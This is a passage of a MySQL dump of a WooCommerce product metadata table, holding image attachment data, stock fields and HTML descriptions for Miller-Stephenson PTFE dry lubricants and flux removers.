:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16668, 1679, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16669, 1679, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16670, 1681, '_edit_lock', '1479928693:3'); 
INSERT INTO `wp_postmeta` VALUES (16671, 1681, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (16672, 1682, '_wp_attached_file', '2016/09/ms-122xd-dry-film-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16673, 1682, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4750;s:6:"height";i:3162;s:4:"file";s:39:"2016/09/ms-122xd-dry-film-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"ms-122xd-dry-film-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"ms-122xd-dry-film-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"ms-122xd-dry-film-lubricant-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"ms-122xd-dry-film-lubricant-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"ms-122xd-dry-film-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"ms-122xd-dry-film-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"ms-122xd-dry-film-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"ms-122xd-dry-film-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16674, 1681, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16675, 1681, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16676, 1681, '_thumbnail_id', '1682'); 
INSERT INTO `wp_postmeta` VALUES (16677, 1681, '312_default_editor', '<ul>\r\n 	<li>Slippery, with outstanding lubricity (low coefficient of friction).</li>\r\n 	<li>Thermally stable (from cryogenic to 500ºF/260ºC).</li>\r\n 	<li>Nonflammable.</li>\r\n 	<li>Chemically inert.</li>\r\n 	<li>Insoluble.</li>\r\n 	<li>Non-migrating (contain no silicones).</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16678, 1681, '1367_default_editor', '<strong>MS-122XD </strong>(14 oz Aerosol)\r\n<strong>MS-143XD </strong>(Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (16679, 1681, '716_default_editor', '<ul>\r\n 	<li>Gears, drive belts and gaskets.</li>\r\n 	<li>Wire and cable.</li>\r\n 	<li>Thread, cord and rope.</li>\r\n 	<li>Chain drives.</li>\r\n 	<li>Metalworking, including extrusion, rolling, drawing and sizing.</li>\r\n 	<li>Machine parts and tools, including nuts, bolts, thread connections, locks, power saw blades and machine mechanisms.</li>\r\n 	<li>Hardware, including hinges, locks and catches, window guides, and guides on cabinet drawers.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16680, 1681, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16681, 1681, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16682, 1681, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16683, 1681, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16684, 1681, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16685, 1681, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16686, 1681, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16687, 1681, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16688, 1681, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16689, 1681, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16690, 1681, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16691, 1681, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16692, 1681, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16693, 1681, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16694, 1681, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16695, 1681, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16696, 1681, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16697, 1681, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16698, 1681, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16699, 1681, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16700, 1681, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16701, 1681, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16702, 1681, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16703, 1681, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16704, 1681, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16705, 1681, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16706, 1681, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16707, 1681, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16708, 1681, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16709, 1681, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16710, 1681, '_ywtm_content_tab_description', 'Miller-Stephenson Release Agent/Dry Lubricants contain a suspension of low molecular weight polytetrafluoroethylene (PTFE) fluoropolymers – white,\r\nwaxy particles of PTFE in an easy to apply form. The outstanding lubricity and low coefficient of friction of PTFE is perfect for use as a dry film lubricant and as a\r\nrelease agent in molding operations.\r\nMS-122XD and MS-143XD are excellent release agents with added advantage of superior release action in the initial cycles. They work well for all applications. As a dry lubricant, they are a very good general purpose lubricant, which produces a uniform coating.'); 
INSERT INTO `wp_postmeta` VALUES (16711, 1681, '_product_image_gallery', '1736'); 
INSERT INTO `wp_postmeta` VALUES (16712, 1647, '_thumbnail_id', '1658'); 
INSERT INTO `wp_postmeta` VALUES (16713, 1683, '_edit_lock', '1474050063:2'); 
INSERT INTO `wp_postmeta` VALUES (16714, 1683, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16715, 1684, '_wp_attached_file', '2016/09/krytox-vydax-dryfilm-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16716, 1684, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4288;s:6:"height";i:2848;s:4:"file";s:42:"2016/09/krytox-vydax-dryfilm-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"krytox-vydax-dryfilm-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"krytox-vydax-dryfilm-lubricant-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:42:"krytox-vydax-dryfilm-lubricant-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:44:"krytox-vydax-dryfilm-lubricant-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"krytox-vydax-dryfilm-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"krytox-vydax-dryfilm-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"krytox-vydax-dryfilm-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"krytox-vydax-dryfilm-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16717, 1683, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16718, 1683, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16719, 1683, '_thumbnail_id', '1684'); 
INSERT INTO `wp_postmeta` VALUES (16720, 1683, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16721, 1683, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16722, 1683, '716_default_editor', '<ul>\r\n 	<li>Oxygen service components, such as valves and seals</li>\r\n 	<li>Lubrication of plastics, elastomers and metal surfaces for assembly and run-in</li>\r\n 	<li>Precision electrical, vacuum and aviation equipment, such as switches, connectors, wire assemblies</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16723, 1683, '719_default_editor', '<ul>\r\n 	<li>ASTM G86</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16724, 1683, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16725, 1683, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16726, 1683, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16727, 1683, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16728, 1683, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16729, 1683, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16730, 1683, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16731, 1683, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16732, 1683, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16733, 1683, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16734, 1683, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16735, 1683, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16736, 1683, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16737, 1683, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16738, 1683, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16739, 1683, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16740, 1683, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16741, 1683, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16742, 1683, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16743, 1683, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16744, 1683, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16745, 1683, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16746, 1683, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16747, 1683, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16748, 1683, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16749, 1683, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16750, 1683, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16751, 1683, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16752, 1683, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16753, 1683, '_ywtm_content_tab_description', 'Vydax™ NRT 960 is a translucent dry film coating that exhibits unique lubrication and anti-stick properties. The coating is clean, non-oily, nonstaining, chemically inert, and can function in continuous use in temperatures up to 200 °C (392 °F).\r\nThis product is non-flammable, CFCi and HCFCii -free. Vydax™ NRT 960 is oxygen safe and LOXiii compatible, as determined per ASTM G86. Components are not classified as, or are exempted from classification as, volatile organic compounds (VOC) by the US EPA.'); 
INSERT INTO `wp_postmeta` VALUES (16754, 1683, '_product_image_gallery', '1731'); 
INSERT INTO `wp_postmeta` VALUES (16755, 1338, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16758, 1690, '_edit_lock', '1491719825:2'); 
INSERT INTO `wp_postmeta` VALUES (16759, 1690, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16760, 1691, '_wp_attached_file', '2016/09/ms-755l-flux-remover.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16761, 1691, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3888;s:6:"height";i:2592;s:4:"file";s:32:"2016/09/ms-755l-flux-remover.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"ms-755l-flux-remover-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"ms-755l-flux-remover-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"ms-755l-flux-remover-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"ms-755l-flux-remover-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"ms-755l-flux-remover-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"ms-755l-flux-remover-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"ms-755l-flux-remover-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"ms-755l-flux-remover-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16762, 1690, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16763, 1690, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16764, 1690, '_thumbnail_id', '1691'); 
INSERT INTO `wp_postmeta` VALUES (16765, 1690, '312_default_editor', '<ul>\r\n 	<li>Ultra Low Global Warming Potential</li>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Safe for most plastics, elastomers and metals</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16766, 1690, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16767, 1690, '716_default_editor', '<ul>\r\n 	<li>Flux Remover</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16768, 1690, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16769, 1690, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16770, 1690, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16771, 1690, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16772, 1690, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16773, 1690, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16774, 1690, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16775, 1690, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16776, 1690, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16777, 1690, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16778, 1690, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16779, 1690, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16780, 1690, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16781, 1690, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16782, 1690, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16783, 1690, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16784, 1690, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16785, 1690, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16786, 1690, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16787, 1690, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16788, 1690, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16789, 1690, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16790, 1690, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16791, 1690, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16792, 1690, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16793, 1690, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (16794, 1690, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16795, 1690, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16796, 1690, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16797, 1690, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16798, 1690, '_ywtm_content_tab_description', 'A strong cleaning agent ideally suited for removal of rosin, organic flux, oils, grease and waxes. It can be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. It replaces n-PB and HCFC-225 in many applications.'); 
INSERT INTO `wp_postmeta` VALUES (16799, 1690, '_product_image_gallery', '1771'); 
INSERT INTO `wp_postmeta` VALUES (16863, 1693, '_edit_lock', '1491830194:2'); 
INSERT INTO `wp_postmeta` VALUES (16864, 1693, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16865, 1694, '_wp_attached_file', '2016/09/ms-flux-remover.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16866, 1694, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5652;s:6:"height";i:3676;s:4:"file";s:27:"2016/09/ms-flux-remover.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"ms-flux-remover-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"ms-flux-remover-800x520.jpg";s:5:"width";i:800;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"ms-flux-remover-768x499.jpg";s:5:"width";i:768;s:6:"height";i:499;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"ms-flux-remover-1600x1041.jpg";s:5:"width";i:1600;s:6:"height";i:1041;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"ms-flux-remover-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"ms-flux-remover-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"ms-flux-remover-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"ms-flux-remover-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16867, 1693, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16868, 1693, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16869, 1693, '_thumbnail_id', '1694'); 
INSERT INTO `wp_postmeta` VALUES (16870, 1693, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16871, 1693, '1367_default_editor', '<strong>H0805A </strong>(10 oz Aerosol)\r\n<strong>H0805B </strong>(4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (16872, 1693, '716_default_editor', '<ul>\r\n 	<li>Flux Remover</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16873, 1693, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16874, 1693, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16875, 1693, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16876, 1693, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16877, 1693, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16878, 1693, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16879, 1693, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16880, 1693, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16881, 1693, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16882, 1693, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16883, 1693, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16884, 1693, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16885, 1693, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16886, 1693, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16887, 1693, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16888, 1693, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16889, 1693, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16890, 1693, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16891, 1693, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16892, 1693, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16893, 1693, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16894, 1693, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16895, 1693, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16896, 1693, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16897, 1693, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16898, 1693, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (16899, 1693, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16900, 1693, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16901, 1693, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16902, 1693, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16903, 1693, '_ywtm_content_tab_description', 'A strong nonflammable cleaning agent containing a blend of hydrofluoroethers with trans-1, 2 dichloroethylene and isopropyl alcohol. This mixture is a blend of azeotropes. Ideally suited for removal of rosin, organic flux, oils, grease and waxes. Can also be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. H0805B can be used in a vapor degreaser. It replaces nPB and HCFC-225 in many applications.'); 
INSERT INTO `wp_postmeta` VALUES (16904, 1693, '_product_image_gallery', '1804'); 
INSERT INTO `wp_postmeta` VALUES (16905, 1695, '_edit_lock', '1491717688:2'); 
INSERT INTO `wp_postmeta` VALUES (16906, 1695, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16907, 1696, '_wp_attached_file', '2016/09/miller-stephenson-flux-remover.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16908, 1696, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5023;s:6:"height";i:3349;s:4:"file";s:42:"2016/09/miller-stephenson-flux-remover.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"miller-stephenson-flux-remover-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"miller-stephenson-flux-remover-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:42:"miller-stephenson-flux-remover-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:44:"miller-stephenson-flux-remover-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"miller-stephenson-flux-remover-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"miller-stephenson-flux-remover-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"miller-stephenson-flux-remover-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4: